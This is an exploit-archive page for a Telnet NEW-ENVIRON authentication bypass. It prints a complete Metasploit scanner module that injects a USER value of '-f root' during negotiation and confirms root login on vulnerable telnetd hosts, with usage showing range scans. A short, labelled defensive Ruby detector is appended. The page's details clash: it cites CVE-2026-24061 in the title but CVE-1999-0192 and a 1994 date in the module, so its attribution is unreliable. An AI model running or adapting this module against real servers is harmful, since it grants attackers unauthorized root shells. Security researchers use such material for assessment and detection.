📄 GNU Inetutils 2.7 Telnet Authentication Bypass Scanner

28 Jan 2026 | Reported by indoushka | Type: packetstorm | Source: packetstorm.news

Metasploit scanner that detects the GNU Inetutils 2.7 Telnet NEW-ENVIRON authentication bypass, which works by injecting a crafted USER environment variable.

=============================================================================================================================================
    | # Title     : GNU Inetutils 2.7 Telnet NEW‑ENVIRON Authentication Bypass Scanner                                                           |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |
    | # Vendor    : System built‑in component. No standalone download available.                                                                |
    =============================================================================================================================================
    
    [+] References :  https://packetstorm.news/files/id/214219/ & CVE-2026-24061 
    
    [+] Summary    : This Metasploit auxiliary scanner detects a Telnet authentication bypass vulnerability related to improper handling of the NEW-ENVIRON option during Telnet negotiation.
                     The issue allows an attacker to inject a malformed USER environment variable (for example, using flags such as -f root) when the server requests environment variables.
                     Affected Telnet daemons may incorrectly trust this input, potentially bypassing password authentication and granting immediate shell access.
                     The module passively listens for the IAC SB NEW-ENVIRON SEND request, then responds with a crafted subnegotiation payload to test whether the target accepts the malicious USER value.
                     It verifies success by analyzing server responses for common indicators of a successful login or shell prompt. When exploitation indicators are detected,
                     the module reports the vulnerability in the Metasploit database.
                     This scanner is intended for security assessment and detection purposes against vulnerable Telnet servers, including implementations such as GNU Inetutils telnetd up to affected versions,
                     and aligns conceptually with historical NEW-ENVIRON authentication bypass issues (e.g., CVE-1999-0192 and related Telnet environment variable flaws).
    
    [+] Usage : 
    
    # View available options
    
    show options
    
    # Set target(s)
    
    set RHOSTS <target_IP_or_range>
    
    # Example: set RHOSTS 192.168.1.1
    
    # Or for a range: set RHOSTS 192.168.1.1-254
    
    # Optional: Change port if Telnet is on non-standard port
    
    set RPORT 2323
    
    # Optional: Adjust timeout (default: 5 seconds)
    
    set TIMEOUT 10
    
    # Optional: Change payload (default: "-f root")
    
    set USER_PAYLOAD "-f admin"
    
    [+] POC :
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Auxiliary
      Rank = NormalRanking
    
      include Msf::Auxiliary::Scanner
      include Msf::Auxiliary::Report
      include Msf::Exploit::Remote::Telnet
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Telnet NEW-ENVIRON Authentication Bypass Scanner',
          'Description'    => %q{
            This module scans Telnet servers for the historical NEW-ENVIRON
            authentication bypass vulnerability (CVE-1999-0192).
    
            Vulnerable Telnet daemons may incorrectly process environment
            variables supplied during NEW-ENVIRON negotiation. By injecting
            a malformed USER value (e.g., "-f root"), authentication checks
            may be bypassed.
    
            This module detects and confirms the bypass condition only.
            It does NOT execute commands or create a session.
          },
          'Author'         =>
            [
              'indoushka'
            ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              ['CVE', '1999-0192'],
              ['RFC', '1572']
            ],
          'DisclosureDate' => '1994-12-12'
        ))
    
        register_options(
          [
            Opt::RPORT(23),
            OptString.new(
              'USER_PAYLOAD',
              [
                true,
                'Malformed USER environment value',
                '-f root'
              ]
            ),
            OptInt.new(
              'TIMEOUT',
              [
                true,
                'Timeout for Telnet negotiation (seconds)',
                5
              ]
            )
          ]
        )
      end
    
      def run_host(ip)
        begin
          connect
          print_status("#{ip}:#{rport} - Connected to Telnet service")
    
          self.sock.telnet_options[:negotiation] = false
    
          new_environ_requested = false
    
          ::Timeout.timeout(datastore['TIMEOUT']) do
            loop do
              data = sock.get_once(-1, 1)
              break if data.nil?
    
              if data.include?("\xff\xfa\x27\x01")
                new_environ_requested = true
                print_good("#{ip}:#{rport} - NEW-ENVIRON request detected")
    
                buf  = "\xff\xfa\x27\x00"
                buf += "\x00USER"
                buf += "\x01"
                buf += datastore['USER_PAYLOAD']
                buf += "\xff\xf0"
    
                print_status("#{ip}:#{rport} - Sending USER=#{datastore['USER_PAYLOAD']}")
    
                Rex.sleep(1)
                response = sock.get_once(-1, datastore['TIMEOUT'])
    
                if response && response =~ /(last login|welcome|login successful|[#\$]>)/i
                  print_good("#{ip}:#{rport} - AUTHENTICATION BYPASS CONFIRMED")
                  print_status("#{ip}:#{rport} - Server response: #{response.strip}")
    
                  report_vuln(
                    host: ip,
                    port: rport,
                    proto: 'tcp',
                    name: self.name,
                    refs: self.references,
                    info: "Authentication bypass via NEW-ENVIRON (USER=#{datastore['USER_PAYLOAD']})"
                  )
                else
                  print_status("#{ip}:#{rport} - Payload sent, but bypass not confirmed")
                end
    
                break
              end
            end
          end
    
          unless new_environ_requested
            print_error("#{ip}:#{rport} - NEW-ENVIRON was not requested (likely not vulnerable)")
          end
    
        rescue ::Timeout::Error
          print_error("#{ip}:#{rport} - Timeout during Telnet negotiation")
        rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
        rescue ::EOFError
          print_error("#{ip}:#{rport} - Server closed the connection")
        rescue ::Interrupt
          raise
        rescue ::Exception => e
          print_error("#{ip}:#{rport} - Unexpected error: #{e.class} - #{e.message}")
        ensure
          disconnect
        end
      end
    end
    
    	
    Greetings to :============================================================
    jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
    ==========================================================================
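
A defender-side counterpart to the negotiation described in the summary, as an added example that is not part of the original advisory or module: it parses client-to-server NEW-ENVIRON subnegotiations per RFC 1572 and flags USER values that begin with a dash. The function names, the leading-dash rule and the sample byte strings are assumptions constructed for illustration.

```ruby
# Added example (not from the original module): defender-side check of
# Telnet NEW-ENVIRON replies (RFC 1572) for option-like USER values.
IS, INFO = 0, 2                       # subnegotiation commands that carry values
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3 # field markers inside the body

# Bodies of all IAC SB NEW-ENVIRON ... IAC SE blocks in a client->server stream.
def new_environ_bodies(stream)
  stream.b.scan(/\xFF\xFA\x27((?:\xFF\xFF|[^\xFF])*)\xFF\xF0/n)
        .flatten.map { |body| body.gsub("\xFF\xFF".b, "\xFF".b).bytes }
end

# Decode an IS/INFO body into [name, value] pairs, honouring ESC-quoted bytes.
def environ_pairs(body)
  return [] unless [IS, INFO].include?(body.first)
  pairs, field, k = [], 0, 1
  while k < body.length
    b = body[k]
    if b == VAR || b == USERVAR
      pairs << [String.new, nil]      # new variable, value not seen yet
      field = 0
    elsif b == VALUE
      pairs.last[1] = String.new if pairs.last
      field = 1
    else
      b = body[k += 1] if b == ESC    # ESC quotes the following byte
      pairs.last[field] << b.chr if pairs.last && b
    end
    k += 1
  end
  pairs
end

# USER values starting with "-" could be read as an option by the login
# program; the leading-dash rule is this example's assumption.
def suspicious_user_values(stream)
  new_environ_bodies(stream)
    .flat_map { |body| environ_pairs(body) }
    .select { |name, value| name == 'USER' && value.to_s.start_with?('-') }
    .map(&:last)
end

# Constructed client->server captures, not real traffic.
BENIGN  = "\xFF\xFA\x27\x00\x00USER\x01alice\xFF\xF0".b
FLAGGED = "\xFF\xFB\x27\xFF\xFA\x27\x00\x00USER\x01-f root\xFF\xF0".b
p suspicious_user_values(BENIGN), suspicious_user_values(FLAGGED)
```

The same check can run over reassembled client-side payloads from a packet capture or a Telnet proxy log; a hit is a reason to inspect the session, since the server's handling of the value decides whether authentication was actually skipped.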

28 Jan 2026 00:00 (current)
Vulners AI Score: 5.9 (Medium risk)
CVSS 2: 10
CVSS 3.1: 9.8
EPSS: 0.91526